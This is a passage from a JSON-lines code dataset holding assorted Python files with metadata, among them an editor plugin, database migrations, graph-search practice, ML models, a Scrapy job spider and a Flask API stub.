executable!\")\n\t\t\tRapidOutputView.printMessage(\"\\\"RapidPath\\\" and/or \\\"RapidExe\\\" variables not found from \\\"Preferences.sublime_settings\\\" file!\")\n\nclass RapidTestCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tdata = subprocess.Popen(['ps','aux'], stdout=subprocess.PIPE).stdout.readlines() \n\t\t#print(data)\n\t\trapid_running = False\n\t\tfor line in data:\n\t\t\tlineStr = line.decode(\"utf-8\")\n\t\t\tif lineStr.find(\"rapid\") > -1:\n\t\t\t\trapid_running = True\n\t\t\t\tbreak\n\t\tif rapid_running:\n\t\t\tprint(\"rapid is already running!\")\n\t\telse:\n\t\t\tprint(\"rapid is not running!\")\n","sub_path":"rapid.py","file_name":"rapid.py","file_ext":"py","file_size_in_byte":12787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181391306","text":"\"\"\"create user table\n\nRevision ID: cae034c85106\nRevises: \nCreate Date: 2016-12-14 10:10:01.051407\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'cae034c85106'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\nimport datetime\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.create_table(\n 'users',\n sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),\n sa.Column('name', sa.String(20), nullable=False),\n sa.Column('passwd', sa.String(64), nullable=False),\n sa.Column('salt', sa.String(50), nullable=False),\n sa.Column('email', sa.String(50), nullable=False),\n sa.Column('create_at', sa.DateTime, default=datetime.datetime.utcnow),\n sa.Column('actived', sa.Boolean, default=False)\n )\n\ndef downgrade():\n op.drop_table('users')\n","sub_path":"iot/model/migration/alembic_migrations/versions/cae034c85106_create_user_table.py","file_name":"cae034c85106_create_user_table.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470657984","text":"\"\"\"\r\n\n\nCreate a function that takes a string and returns the **sum of vowels** ,\nwhere some vowels are considered numbers.\n\nVowel| Number \n---|--- \nA| 4 \nE| 3 \nI| 1 \nO| 0 \nU| 0 \n \n### Examples\n\n sum_of_vowels(\"Let\\'s test this function.\") ➞ 8\n \n sum_of_vowels(\"Do I get the correct output?\") ➞ 10\n \n sum_of_vowels(\"I love edabit!\") ➞ 12\n\n### Notes\n\nVowels are case-insensitive ( _e.g. A = 4 and a = 4_ ).\n\n\"\"\"\r\n\ndef sum_of_vowels(sentence):\n total = 0\n point = {'a' : 4, 'e' : 3, 'i' : 1, 'o' : 0, 'u' : 0}\n vowels = ['a', 'e', 'i', 'o', 'u']\n sentence = sentence.lower()\n for x in sentence:\n if x in vowels:\n total += point[x]\n return total\n\n","sub_path":"6NoaFGKJgRW6oXhLC_12.py","file_name":"6NoaFGKJgRW6oXhLC_12.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"23807826","text":"\"\"\" Practice Implementing Graph Algorithms \"\"\"\nimport queue\nimport graph\nimport collections\n\n\ndef depth_first_search(node, visited=collections.defaultdict(bool)):\n \"\"\" Mimics a search dfs algorithm by printing the values \"\"\"\n if node is None:\n return\n print(node.name)\n visited[node.name] = True\n for n in node.nodes:\n if not visited[n.name]:\n depth_first_search(n, visited)\n\ndef breadth_first_search(node):\n \"\"\" Mimics a bfs search by printing the values \"\"\"\n if node is None:\n return\n visited = collections.defaultdict(bool)\n Q = queue.Queue(0)\n Q.put(node)\n visited[node.name] = True\n\n while (not Q.empty()):\n # deque first item\n cur_node = Q.get()\n print(cur_node.name)\n for n in cur_node.nodes:\n if not visited[n.name]:\n visited[n.name] = True\n Q.put(n)\n\n\nif __name__ == '__main__':\n # Create a graph in CTCI pg. 107\n ug = graph.DirectedGraph()\n\n node_0 = graph.Node(0)\n node_1 = graph.Node(1)\n node_2 = graph.Node(2)\n node_3 = graph.Node(3)\n node_4 = graph.Node(4)\n node_5 = graph.Node(5)\n\n node_0.nodes = [node_1, node_4, node_5]\n node_1.nodes = [node_3, node_4]\n node_2.nodes = [node_1]\n node_3.nodes = [node_2, node_4]\n\n print('DFS order:')\n depth_first_search(node_0)\n print('BFS order:')\n breadth_first_search(node_0)","sub_path":"python/practice/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463065190","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Reformat corresponding (im)perfective specs using {{pf}} or {{impf}}\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, msg, errmsg, site\n\ndef process_page(page, index, parsed):\n pagetitle = str(page.title())\n subpagetitle = re.sub(\"^.*:\", \"\", pagetitle)\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n def errpagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n errmsg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n pagemsg(\"Processing\")\n\n if \":\" in pagetitle:\n pagemsg(\"WARNING: Colon in page title, skipping page\")\n return\n\n text = str(page.text)\n notes = []\n\n foundrussian = False\n sections = re.split(\"(^==[^=]*==\\n)\", text, 0, re.M)\n\n for j in range(2, len(sections), 2):\n if sections[j-1] == \"==Russian==\\n\":\n if foundrussian:\n pagemsg(\"WARNING: Found multiple Russian sections, skipping page\")\n return\n foundrussian = True\n\n # Try to convert multi-line usex using #:\n def generate_new_format_corverb(m):\n pfimpf = m.group(1)\n verbtext = m.group(2)\n verbs = re.split(\" *(?:,|or) *\", verbtext)\n newverbs = []\n for index, verb in enumerate(verbs):\n qual = \"\"\n if \"only\" in verb:\n verb = re.sub(\" *only *\", \"\", verb)\n qual = \"only\"\n if \"also\" in verb:\n verb = re.sub(\" *also *\", \"\", verb)\n qual = \"also\"\n if \"{{i|low colloquial}} \" in verb:\n verb = re.sub(r\" *\\{\\{i\\|low colloquial\\}\\} *\", \"\", verb)\n qual = \"low colloquial\"\n if qual:\n qual = \"|q%s=%s\" % (index + 1, qual)\n m = re.search(r\"^\\[\\[(.*)\\]\\]$\", verb)\n if m:\n newverbs.append(m.group(1) + qual)\n continue\n m = re.search(r\"^\\{\\{[ml]\\|ru\\|(.*)\\}\\}$\", verb)\n if m:\n newverbs.append(m.group(1) + qual)\n continue\n pagemsg(\"WARNING: Unable to parse verb spec %s, treating as raw\" % verb)\n newverbs.append(verb + qual)\n return \"\\n#: {{%s|ru|%s}}\\n\" % (pfimpf, \"|\".join(newverbs))\n sections[j] = re.sub(r\", *\\{\\{g\\|(pf|impf)\\}\\} *[-–—:] * (.*)\\n\",\n generate_new_format_corverb, sections[j])\n # Repeatedly move {{pf}}/{{impf}} after usexes\n while True:\n replacement = re.sub(r\"\\n(#: \\{\\{(?:pf|impf)\\|.*?\\}\\}.*\\n)(#\\*?: \\{\\{ux.*?\\}\\}.*\\n)\",\n r\"\\n\\2\\1\", sections[j])\n if replacement == sections[j]:\n break\n sections[j] = replacement\n if \"{{g|pf}}\" in sections[j] or \"{{g|impf}}\" in sections[j]:\n errpagemsg(\"WARNING: Found unconverted {{g|pf}} or {{g|impf}}\")\n if \" pf\" in sections[j] or \" impf\" in sections[j]:\n errpagemsg(\"WARNING: Found unconverted pf or impf following a space\")\n\n return \"\".join(sections), \"Reformat Russian perfective/imperfective correspondences to use {{pf}}/{{impf}}\"\n\nparser = blib.create_argparser(\"Reformat corresponding (im)perfective specs using {{pf}} or {{impf}}\",\n include_pagefile=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_page, edit=True,\n default_cats=[\"Russian verbs\"])\n","sub_path":"reformat_pf_impf.py","file_name":"reformat_pf_impf.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"593798380","text":"import operator\n\nf=open(\"jobs.txt\",\"r\")\nmaxweight=0\ncount=0\nno=0\njobs=[]\nfor line in f:\n line=line.rstrip(\"\\n\")\n if(count==0):\n no=int(line)\n else:\n lw,hw=map(int,line.split())\n jobs.append([lw,hw,lw/hw])\n count+=1\n\njobs=sorted(jobs,key=operator.itemgetter(2))\njobs = jobs[-1::-1]\nsumTime = 0\nsumLength = 0 \nfor job in jobs:\n sumLength += job[1]\n sumTime += job[0] * sumLength\nprint(sumTime)\n","sub_path":"Week-1/scheduling2.py","file_name":"scheduling2.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"407490856","text":"from ple.games.catcher import Catcher\nfrom ple import PLE\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nclass RandomAgent:\n\tdef __init__(self, actions):\n\t\tself.actions = actions\n\n\tdef pickAction(self, state, reward):\n\t\treturn random.choice(self.actions)\n'''\nState Formate:\n{\n 'player_x': int,\n 'player_vel': float,\n 'fruit_x': int,\n 'fruit_y': int\n}\nActions:\n[97, 100, None]\n'''\n\ngame = Catcher(width=256, height=256, init_lives=3)\n\np = PLE(game, fps=30, display_screen=True, force_fps=False)\np.init()\n\nagent = RandomAgent(p.getActionSet())\nnb_frames = 1000\nreward = 0.0\n\n# controllers\nrewards = {\n\t'positive': 0,\n\t'negative': 0,\n\t'tick': 0,\n}\n\n# Set data\nq = pd.DataFrame(columns=['player_x','player_vel','fruit_x','fruit_y','action','reward'])\n\nprint(game.getGameState())\nprint(p.getActionSet())\n\n# for f in range(nb_frames):\nwhile rewards['positive'] < 50 or rewards['negative'] < 50:\n\tif p.game_over(): #check if the game is over\n\t\tp.reset_game()\n\n\tstate = game.getGameState()\n\taction = agent.pickAction(state, reward)\n\treward = p.act(action)\n\n\tif float(reward) == 1.0 or float(reward) == -1.0: # concat only positive and negative rewards\n\n\t\tnewQ = pd.DataFrame([[\n\t\t\tint(state['player_x']),\n\t\t\tfloat(state['player_vel']),\n\t\t\tint(state['fruit_x']),\n\t\t\tint(state['fruit_y']),\n\t\t\taction,float(reward)\n\t\t\t]], columns=list(q))\n\n\t\tif reward == 1.0:\n\t\t\trewards['positive'] += 1\n\t\telif reward == -1.0:\n\t\t\trewards['negative'] += 1\n\t\telif reward == 0.0:\n\t\t\treward['tick'] += 1\n\n\t\tq = pd.concat([q,newQ], ignore_index=True)\n\n\npositive = q['reward'] == 1.0\nnegative = q['reward'] == -1.0\ntick = q['reward'] == 0.0\n\nq_positive = q[positive]\nq_negative = q[negative]\nq_tick = q[tick]\n\nprint(len(q))\n\n# Plot\nplt.scatter(x=q_positive['player_x'], y=q_positive['fruit_x'])\nplt.scatter(x=q_negative['player_x'], y=q_negative['fruit_x'])\nplt.show()\n","sub_path":"04_ReinforcementLearning/agents/Catcher.py","file_name":"Catcher.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644793983","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n# Use already implemented GCN\nfrom torch_geometric.nn import GCNConv, GATConv\n\n\nclass GCN(nn.Module):\n\t\"\"\"\n\tConstruct a GNN with 2 GCN blocks\n\t\"\"\"\n\tdef __init__(self, input_dim, hidden_dim, output_dim, dropout):\n\t\tsuper(GCN, self).__init__()\n\n\t\tself.dropout = dropout\n\t\tself.conv_in = GCNConv(input_dim, hidden_dim[0])\n\t\tself.conv = [GCNConv(hidden_dim[i-1], hidden_dim[i]) for i in range(1,len(hidden_dim))]\n\t\tself.conv_out = GCNConv(hidden_dim[-1], output_dim)\n\n\tdef forward(self, x, edge_index):\n\t\tx = F.relu(self.conv_in(x, edge_index))\n\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\n\t\tfor block in self.conv:\n\t\t\tx = F.relu(block(x, edge_index))\n\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\n\t\tx = self.conv_out(x,edge_index)\n\n\t\treturn F.log_softmax(x, dim=1)\n\n\nclass GAT(nn.Module):\n\tdef __init__(self, input_dim, hidden_dim, output_dim, dropout, n_heads):\n\t\tsuper(GAT, self).__init__()\n\t\tself.dropout = dropout\n\n\t\tself.conv_in = GATConv(input_dim, hidden_dim[0], heads=n_heads[0], dropout=self.dropout)\n\t\tself.conv = [GATConv(hidden_dim[i-1] * n_heads[i-1], hidden_dim[i], heads=n_heads[i], dropout=self.dropout) for i in range(1,len(n_heads)-1)]\n\t\tself.conv_out = GATConv(hidden_dim[-1] * n_heads[-2], output_dim, heads=n_heads[-1], dropout=self.dropout, concat=False)\n\n\tdef forward(self, x, edge_index, att=None):\n\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\n\t\tif att: # if we want to see attention weights\n\t\t\tx, alpha = self.conv_in(x, edge_index, return_attention_weights=att)\n\t\t\tx = F.elu(x)\n\n\t\t\tfor attention in self.conv:\n\t\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\t\tx = F.elu(attention(x, edge_index))\n\t\t\t\n\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\tx, alpha2 = self.conv_out(x, edge_index, return_attention_weights=att)\n\t\t\n\t\t\treturn F.log_softmax(x, dim=1), alpha, alpha2\n\t\t\n\t\telse: \n\t\t\tx = self.conv_in(x, edge_index)\n\t\t\tx = F.elu(x)\n\n\t\t\tfor attention in self.conv:\n\t\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\t\tx = F.elu(attention(x, edge_index))\n\t\t\t\n\t\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\t\tx = self.conv_out(x, edge_index)\n\t\t\n\t\t\treturn F.log_softmax(x, dim=1)\n","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"28443511","text":"import glob\nimport argparse\nimport cv2\nimport numpy as np\nimport argparse\nimport tensorflow as tf\nfrom os import path, makedirs\nfrom env import *\nfrom utils import load_test_image, load_mask, rgb2hsv, pb_predict_mask, pct_to_label, R_squared, visualize\nmodel_path = \"./models/model_cloud_seg_e2e.pb\"\n\nwith tf.gfile.GFile(model_path, \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\nwith tf.Graph().as_default() as graph:\n tf.import_graph_def(graph_def)\n\nsess = tf.Session(graph=graph)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target_ds\")\nargs = parser.parse_args()\n\nprint(\"model loaded.\")\n\nd_img = path.join(args.target_ds,\"images\")+\"/*\"\nd_mask = path.join(args.target_ds, \"masks\")+\"/*\"\nimg_paths = sorted(glob.glob(d_img))\nmask_paths = sorted(glob.glob(d_mask))\n\n\nj, wrong_count = 0,0\ny_pred, y_true = [], []\nprint(img_paths)\nfor img_path, mask_path in zip(img_paths, mask_paths):\n\n img = load_test_image(img_path, dsize = (IMG_HEIGHT, IMG_WIDTH))\n img_hsv = rgb2hsv(img, normalization = True) \n mask = pb_predict_mask(sess, img) > CLOUD_THRES\n #mask = pb_predict_window_mask(sess, img_hsv, window_size = SLIDING_WINDOW_SIZE) > CLOUD_THRES\n #mask = np.zeros_like(img_hsv[...,0])\n mask_pct = np.sum(mask)/(mask.shape[0]*mask.shape[1])*100\n gt_mask = load_mask(mask_path, dsize = (IMG_HEIGHT, IMG_WIDTH))/255.0 > CLOUD_THRES\n gt_mask_pct = np.sum(gt_mask)/(gt_mask.shape[0]*gt_mask.shape[1])*100\n y_pred.append(mask_pct)\n y_true.append(gt_mask_pct)\n \n if pct_to_label(mask_pct) != pct_to_label(gt_mask_pct):\n wrong_count +=1\n print(\"Wrong Prediction. {} has around {}% of sky area. Predicted:{}%\".format(img_path, PCT_LVL[pct_to_label(gt_mask_pct)], PCT_LVL[pct_to_label(mask_pct)]))\n print(\"More info on unsampled pct. GT:{}% Predicted:{}%\".format(gt_mask_pct, mask_pct))\n \n if not path.exists('./results_cloud'):\n makedirs('./results_cloud')\n visualize(img, mask, path = \"./results_cloud/\"+img_path.split(\"/\")[-1].split(\".\")[0]+\"_pred.jpg\" )\n j+=1\n","sub_path":"cloud_demo.py","file_name":"cloud_demo.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343851988","text":"\"\"\"empty message\n\nRevision ID: 916187b6841e\nRevises: \nCreate Date: 2020-04-20 22:10:38.984706\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '916187b6841e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('stations', sa.Column('rotation', sa.String(length=80), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('stations', 'rotation')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/916187b6841e_.py","file_name":"916187b6841e_.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"545416218","text":"from api.method import send_message\nfrom utils import filters, message_utils\n\nimport random\n\nvalue_error_text = 'Arguments must be positive integers.'\nhelp_text = 'No arguments: *random number* from 1 to 9.\\n1 argument: from 1 to argument.\\n' \\\n '2 arguments: from 1st argument to 2nd.'\n\n\ndef handler(update):\n message = update.message\n text = message_utils.get_text_or_caption(message)\n if not text:\n return\n params = filters.command(text, 'rand')\n\n if params is not None:\n result = None\n if params == []:\n result = random.randint(1, 9)\n\n elif params[0] == 'help':\n result = help_text\n\n elif len(params) == 1:\n try:\n result = random.randint(1, int(params[0]))\n except ValueError:\n result = value_error_text\n\n elif len(params) == 2:\n try:\n result = random.randint(int(params[0]), int(params[1]))\n except ValueError:\n result = value_error_text\n \n if result:\n send_message(message.chat.id, result, parse_mode='Markdown')\n return True\n","sub_path":"handlers/rng.py","file_name":"rng.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388711145","text":"# -*- coding: utf-8 -*-\n__author__ = \"Bellini Gianni \"\n__version__ = \"02.01 2018-10-10\"\n\nimport sqlite3 as lite\nimport sys\n\nif __name__ == (\"__main__\"):\n file1 = open(\"classi_considerate.TXT\",\"r\")\n stringa = file1.readline()\n stringaSplit = \"\"\n classi = []\n classiAss = []\n while(stringa != \"\"):\n stringaSplit = stringa.split(\";\")\n classi.append(stringaSplit[0])\n stringa = file1.readline()\n\n i = 0\n u = 0\n cont = 0\n\n while (i < 12):\n classiAss.append(str(classi[0]))\n stringa3 = str(classi[0])\n classi.remove(stringa3)\n stringa3 = \"\"\n u += 1\n if(u > 3):\n print(classiAss)\n stringa3 = str(classiAss[cont])\n classi.append(stringa3)\n cont += 1\n i += 1\n print(classiAss)\n\n try:\n con = lite.connect(\"scrutini.db\")\n cur = con.cursor()\n cur = con.execute(\"SELECT sigla FROM Aule\")\n dat = cur.fetchall()\n print(dat)\n\n except lite.Error as e:\n print(\"ciao\")\n","sub_path":"classi.py","file_name":"classi.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"448607064","text":"\"\"\"Basic RESTFUL API as defined in https://flask-restful.readthedocs.io/en/latest/quickstart.html.\"\"\"\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask_restful import reqparse, abort, Api, Resource\n\napp = Flask(__name__)\nCORS(app)\napi = Api(app)\n\n# TODOS = {\n# 'todo1': {'task': 'build an API'},\n# 'todo2': {'task': '?????'},\n# 'todo3': {'task': 'profit!'},\n# }\n\nuser_list = [\n {\n 'name': 'test user',\n 'email': 'test@f.c'\n },\n {\n 'name': 'mark mccorkle',\n 'email': 'mark@f.c'\n },\n {\n 'name': 'other user',\n 'email': 'ou@test.dom'\n }\n]\n\norganizations = ['Organization Foo', 'Organization Bar']\n\n\n# def abort_if_todo_doesnt_exist(todo_id):\n# if todo_id not in TODOS:\n# abort(404, message=\"Todo {} doesn't exist\".format(todo_id))\n\n\n# parser = reqparse.RequestParser()\n# parser.add_argument('task')\n\n\n# Todo\n# shows a single todo item and lets you delete a todo item\n# class Todo(Resource):\n# def get(self, todo_id):\n# abort_if_todo_doesnt_exist(todo_id)\n# return TODOS[todo_id]\n\n# def delete(self, todo_id):\n# abort_if_todo_doesnt_exist(todo_id)\n# del TODOS[todo_id]\n# return '', 204\n\n# def put(self, todo_id):\n# args = parser.parse_args()\n# task = {'task': args['task']}\n# TODOS[todo_id] = task\n# return task, 201\n\n# # TodoList\n# # shows a list of all todos, and lets you POST to add new tasks\n# class TodoList(Resource):\n# def get(self):\n# return TODOS\n\n# def post(self):\n# args = parser.parse_args()\n# todo_id = int(max(TODOS.keys()).lstrip('todo')) + 1\n# todo_id = 'todo%i' % todo_id\n# TODOS[todo_id] = {'task': args['task']}\n# return TODOS[todo_id], 201\n\n\nclass User(Resource):\n \"\"\"All users CRUD.\"\"\"\n\n def get(self, user_id):\n \"\"\"Get this user ID.\"\"\"\n return user_list[user_id]\n\n def post(self):\n \"\"\"Create a new user.\"\"\"\n print('WARNING: STUB for User.post')\n return False\n\n def delete(self, user_id):\n \"\"\"Mark a user a deleted.\"\"\"\n print('WARNING: STUB for User.delete')\n return False\n\n def put(self, user_id):\n \"\"\"Update an existing User.\"\"\"\n print('WARNING: STUB for User.put')\n return False\n\n\nclass Users(Resource):\n \"\"\"GET for a list of all users.\"\"\"\n\n def get(self, substring=None):\n \"\"\"Get this user ID.\"\"\"\n # TODO: apply substring to user list, only return substring\n # TODO: apply security filter for asking user context.\n return user_list\n\n\nclass Orgizations(Resource):\n \"\"\"Getter for organization list.\"\"\"\n\n def get(self):\n \"\"\"Get all organizations.\"\"\"\n return organizations\n\n\napi.add_resource(User, '/user/')\napi.add_resource(Users, '/users')\napi.add_resource(Orgizations, '/organizations')\n\n# example endpoints\n# api.add_resource(TodoList, '/todos')\n# api.add_resource(Todo, '/todos/')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"92811940","text":"\"\"\"\n This spider is a GameLoft spider created on top of the ATSSpider\n scrapy crawl gameloft -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.gameloft.com/corporate/jobs/apply\"\n\n sample job url:\n http://www.gameloft.com/corporate/jobs/job-apply-details/73/?group=80&job=4099&loc=58&applyby=categ\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, NormalizedJoin\n\n\nclass GameLoft(ATSSpider):\n\n name = \"gameloft\"\n Ref_Num = compile(r\"&job=(\\d+)\")\n Countries_List = compile(r'arrCountries\\s*=\\s*\"(.*)\";')\n\n def parse(self, response):\n selector = Selector(response)\n categories = selector.xpath(\n '//div[@class=\"j-a-category-list\"]/ul/li/a'\n )\n for category in categories:\n category_url = category.xpath('./@href').extract()\n if category_url:\n yield Request(\n callback=self.parse_countrylist,\n meta={\n 'jobcategory': category.xpath('./p/text()').extract(),\n 'group_num': category_url[0].split('group=(\\d+)')[-1],\n },\n url=category_url[0]\n )\n\n def parse_countrylist(self, response):\n selector = Selector(response)\n countries_list = selector.xpath(\n '//script//text()').re(self.Countries_List)\n if countries_list:\n yield FormRequest(\n callback=self.parse_jobslist,\n formdata={\n 'listOfCountries': countries_list[0],\n 'groupDetails': response.meta.get('group_num'),\n },\n meta={'jobcategory': response.meta.get('jobcategory', '')},\n url=response.url\n )\n\n def parse_jobslist(self, response):\n selector = Selector(response)\n jobs = selector.xpath(\n '//ul[@class=\"mobileJobIndicator\"]/li/a/@href').extract()\n for job in jobs:\n req = Request(\n callback=self.parse_job_callback(),\n meta={'jobcategory': response.meta.get('jobcategory', '')},\n url=job\n )\n yield req\n\n def parse_job(self, response):\n selector = Selector(response)\n\n loader = BrightcorpItemLoader(selector=selector)\n\n desc_xpath = '//div[@class=\"set\"]/h4[text()=\"%s\"]/following-sibling::node()'\n\n details = selector.xpath('//h1[@class=\"job-det\"]/text()').extract()\n if details:\n details = details[0].split('-')\n if len(details) == 2:\n loader.add_value('location', details[-1])\n elif len(details) == 3:\n loader.add_value(\n 'location', [details[1], details[-1]], NormalizedJoin(\", \")\n )\n\n loader.add_xpath('benefits', desc_xpath % 'Why Join Us', NormalizedJoin())\n loader.add_xpath('description', desc_xpath % 'ABOUT THE JOB')\n loader.add_xpath('requirements', desc_xpath % 'PROFILE')\n loader.add_xpath('title', '//span[@class=\"job-title\"]/text()')\n\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.Ref_Num\n )\n loader.add_value('jobcategory', response.meta.get('jobcategory'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/gameloft.py","file_name":"gameloft.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112495558","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/03/26 16:14\n# @Author : zhouwentao\nfrom app.main.pipe_factory.dao.delivery_item_dao import delivery_item_dao\nfrom app.main.pipe_factory.dao.delivery_sheet_dao import delivery_sheet_dao\nfrom app.main.pipe_factory.entity.delivery_sheet import DeliverySheet\nfrom app.main.pipe_factory.entity.delivery_item import DeliveryItem\nfrom app.util.uuid_util import UUIDUtil\n\n\ndef generate_sheets(sheets):\n \"\"\"根据json数据生成对应的发货通知单\"\"\"\n sheets_list = []\n for sheet in sheets:\n delivery_sheet = DeliverySheet(sheet)\n for index in range(len(delivery_sheet.items)):\n delivery_sheet.items[index] = DeliveryItem(delivery_sheet.items[index])\n sheets_list.append(delivery_sheet)\n\n return sheets_list\n\n\ndef save_sheets(result_list):\n \"\"\"\n\n :param result_list:\n :return:\n \"\"\"\n items = list()\n for i in result_list:\n i.delivery_no = UUIDUtil.create_id(\"de\")\n for j in i.items:\n j.delivery_no = i.delivery_no\n j.delivery_item_no = UUIDUtil.create_id(\"di\")\n items.extend(i.items)\n delivery_sheet_dao.batch_insert(result_list)\n delivery_item_dao.batch_insert(items)\n","sub_path":"app/main/pipe_factory/service/sheet_service.py","file_name":"sheet_service.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"134597546","text":"######################################################################################################\n# import libraries\n######################################################################################################\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.decomposition import PCA\n\n\n######################################################################################################\n# def functions\n######################################################################################################\ndef vec_density(d):\n d_for_hist = d * 10 ** precision\n hist = np.zeros(int(np.max(d_for_hist)) + 1)\n for val in d_for_hist:\n hist[int(val)] += 1\n return hist / np.sum(hist)\n\n\ndef entropy(fx):\n tmp = []\n for trial in np.arange(0, len(fx), 1):\n if fx[trial] == 0:\n tmp += [0]\n else:\n tmp += [-1 * fx[trial] * np.log2(fx[trial])]\n return np.sum(tmp)\n\n\ndef analyze_data(data):\n trials, features = np.shape(data)\n # calc variance\n var_data = np.var(data, axis=0)\n # calc entropy\n entropy_data_features = np.zeros(features)\n for feature in np.arange(0, features, 1):\n fx = vec_density(data[:, feature])\n entropy_data_features[feature] = entropy(fx)\n return var_data, entropy_data_features\n\n\n######################################################################################################\n# gaussian data\n######################################################################################################\n# create data\ntrials = 1000\nfeatures = 10\nprecision = 2\nm = 1000\nmean = np.array([m, m, m, m, m, m, m, m, m, m])\nc = 0 # no correlation between any two features!\n\nfor (v1, v2, v3, v4) in [(1, 1, 1, 1), (1, 10, 80, 200)]:\n\n cov = np.array([\n [v1, c, c, c, c, c, c, c, c, c],\n [c, v1, c, c, c, c, c, c, c, c],\n [c, c, v1, c, c, c, c, c, c, c],\n [c, c, c, v3, c, c, c, c, c, c],\n [c, c, c, c, v3, c, c, c, c, c],\n [c, c, c, c, c, v4, c, c, c, c],\n [c, c, c, c, c, c, v4, c, c, c],\n [c, c, c, c, c, c, c, v2, c, c],\n [c, c, c, c, c, c, c, c, v2, c],\n [c, c, c, c, c, c, c, c, c, v2],\n ])\n\n data = np.transpose(np.round(np.random.multivariate_normal(mean, cov, trials).T, decimals=precision))\n\n ### before PCA - var and entropy\n var_data, entropy_data_features = analyze_data(data)\n var_data_sum = np.sum(var_data)\n entropy_data_features_sum = np.sum(entropy_data_features)\n var_data_sorted_neg, entropy_data_features_sorted = (list(t) for t in\n zip(*sorted(zip(-var_data, entropy_data_features))))\n var_data_sorted = -np.array(var_data_sorted_neg)\n\n ### after PCA - var and entropy\n pca = PCA(n_components=features)\n principalComponents = pca.fit(data)\n data_projected = pca.transform(data)\n var_data_projected, entropy_data_projected_features = analyze_data(data_projected)\n var_data_projected_sum = np.sum(var_data_projected)\n entropy_data_projected_features_sum = np.sum(entropy_data_projected_features)\n\n print(\"entropy before PCA:\", entropy_data_features_sum)\n print(\"variance before PCA:\", var_data_sum)\n print(\"entropy after PCA:\", entropy_data_projected_features_sum)\n print(\"variance after 